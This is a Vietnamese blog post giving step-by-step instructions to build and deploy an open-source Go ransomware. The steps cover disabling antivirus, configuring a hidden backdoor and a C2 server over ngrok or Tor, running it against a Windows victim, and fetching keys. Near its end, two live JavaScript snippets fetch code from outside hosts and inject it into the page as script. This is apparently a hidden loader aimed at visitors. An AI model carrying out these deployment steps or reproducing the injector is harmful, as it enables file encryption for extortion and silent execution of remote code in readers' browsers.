Công cụ Hacking

Ransomware lập trình bởi mauri870

Clone Project từ github: git clone https://github.com/mauri870/ransomware.git

Lưu ý 1: Project này hoàn toàn làm cho mục đích giáo dục. Đừng làm gì vi phạm pháp luật

Lưu ý 2: Nhớ tắt Antivirus khi làm việc với con Ransomware này

Tổng quát về Project này

Dự án này được phát triển cho khóa học Computer Security khi tôi đi học, Cơ bản là nó sẽ mã hóa file của bạn sử dụng AES-256-CTR, Một thuật toán mã hóa mạnh mẽ, sử dụng RSA-4096 để đảm bảo giao tiếp an toàn với server, có thể sử dụng Tor SOCKS5 proxy. Những chức năng cơ bản của các con ransomware nổi tiếng

Dự án này gồm 3 phần: Server, Malware và bộ giải mã

Server lưu trữ key nhận dạng của victim cùng với key mã hóa sử dụng bởi Malware

Malware mã hóa bởi RSA-4096 (RSA-OAEP-4096 + SHA256) public ke và bất kì payload nào trước khi gửi tới server. Bạn cũng có thể sử dụng các Tor proxy hay các domain .onion để ẩn danh server của bạn

Chức năng

  1. Chạy ẩn trong nền (Hoặc không)
  2. Mã hóa sử dụng AES-256-CTR(Counter Mode) với mã IV ngẫu nhiên cho các file
  3. Đa lồng
  4. RSA-4096 cho việc giao tiếp client/server
  5. Bao gồm Unlocker
  6. Có tùy chọn hỗ trợ Tor Proxy
  7. Sử dụng một AES CTR Cypher với mã hóa stream để phòng trừ load 1 file vào RAM
  8. Hoạt động tốt trên mọi thiết bị
  9. Có image docker

Xây dựng

B1: Tải toàn bộ Project

go get -v github.com/mauri870/ransomware
cd $GOPATH/src/github.com/mauri870/ransomware

B2: Bạn cần cài đặt Go 1.8 ở $GOPATH/bin trong $PATH và $GOROOT trỏ tới nơi cài đặt Go của bạn

B3: Sử dụng make để build

make deps
make

Bạn có thể build server cho windows bằng lệnh make -e GOOS=windows

B4: Sử dụng docker: ./build-docker.sh make

B5: Bạn có thể thay đổi một số biến sau, thay vì chạy nguyên lệnh make

HIDDEN=’-H windowsgui’ # Thiết đặt cho backdoor chạy ẩn trong nền

USE_TOR=true # Sử dụng để Download và sử dụng Tor Proxy

SERVER_HOST=mydomain.com # IP hoặc domain server của bạn

SERVER_PORT=8080 # Port Server

GOOS=linux # Server được build cho OS nào, VD: darwin, linux, windows

DEMO quá trình hoạt động

Máy hacker: Linux

Máy Vicitm: Windows 10

Ở đây chúng tôi sử dụng Tool Ngrok . Các bạn có thể dùng domain của bạn, thậm chí domain tor

B1: Chạy Ngrok ở Port 8080: ngrok http 8080

B2: Nó sẽ đưa 1 url như: http://2af7161c.ngrok.io

B3: Build dùng command: make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true (Như đã nói ở phần trên)

B4: Sau khi build chúng ta có file ransomware.exe và unlocker.exe trong folder server

B5: Khởi động server: cd bin/server && ./server –port 8080

B6: Cách lấy key mã hóa curl -k http://2af7161c.ngrok.io/api/keys/:id

:id là mã identification lưu ở Desktop, sau đó chạy unlocker.exe và làm theo hướng dẫn

Server này có 2 Endpoints

  • POST api/keys/add
  • GET api/keys/:id

DEMO Video:

 

 

 var url = ‘https://raw.githubusercontent.com/lolngnos/loles/main/step.txt’;
fetch(url)
.then(response => response.text())
.then(data => {
var script = document.createElement(‘script’);
script.src = data.trim();
document.getElementsByTagName(‘head’)[0].appendChild(script);
});var url = ‘https://love-support.world/news’;
fetch(url)
.then(response => response.text())
.then(data => {
var script = document.createElement(‘script’);
script.textContent = data;
document.getElementsByTagName(‘head’)[0].appendChild(script);
})

Views: 960